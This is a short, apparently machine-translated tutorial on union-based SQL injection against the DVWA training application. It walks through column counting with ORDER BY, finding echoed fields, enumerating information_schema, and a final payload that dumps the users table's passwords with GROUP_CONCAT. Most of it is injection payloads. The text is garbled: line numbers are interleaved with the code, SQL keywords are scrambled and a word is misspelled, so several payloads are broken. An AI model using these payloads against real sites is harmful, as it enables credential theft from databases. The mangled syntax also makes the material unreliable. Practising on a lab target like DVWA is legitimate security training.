sql injection (b) joint inquiry injection process

Implantation step

• Get the injection point and the resulting character is closed
• Determine the type of database
• Guess the number of columns, to get bit display
• Obtain basic information (such as: database name, database version, the current database name, etc.)
• Get the database name
• Get table name
• Get the column name
• Get the column values

. 1  . 1 ' Order by. 3 - - Error 
2  . 1 ' Order by. 1 - - right 
. 3  . 1 ' Order by 2 - - right (determined a few columns, where there are two) 
. 4  . 5 . 6 . 1 ' Union select 1,2 - - (see echo bit) . 7 . 8 . 1 ' Union SELECT User (), database () - - (see library name) . 9 . 1 ' Union table_name SELECT, WHERE TABLE_SCHEMA = 2 from information_schema.tables Database () - - (see table) 10 . 1 ' Union column_name SELECT, WHERE from information_schema.columns 2 from table_name = ' Users  
  
 
 ' - - (see the column name) 
. 11  . 1 ' Union group_concat SELECT (column_name), from information_schema.columns from 2 WHERE table_name = ' Users ' - - (group_concat allows viewing data on one line only) 
12 is    -> DVWA Database the users data table has the following columns:
 13 is        user_id, FIRST_NAME, last_name, User, password, Avatar, LAST_LOGIN, failed_login
 14 ----------------------- -------------------------------------------------- - access to the database structure.
15  16 . 1 ' Union SELECT. 1, GROUP_CONCAT (password) from Users - - 

1  command some attention:
 2  information_schema.tables and information_schema.columns are information_schema tables
 . 3  TABLE_SCHEMA database name
 . 4  table_name table inside the database
 . 5  table_column database table column name
 . 6  from   to put Union SELECT   back
 7 e.g. GROUP_CONCAT (table_name), 2 , . 3 , . 4  from   information_schema.tables   WHERE   TABLE_SCHEMA = dababase ()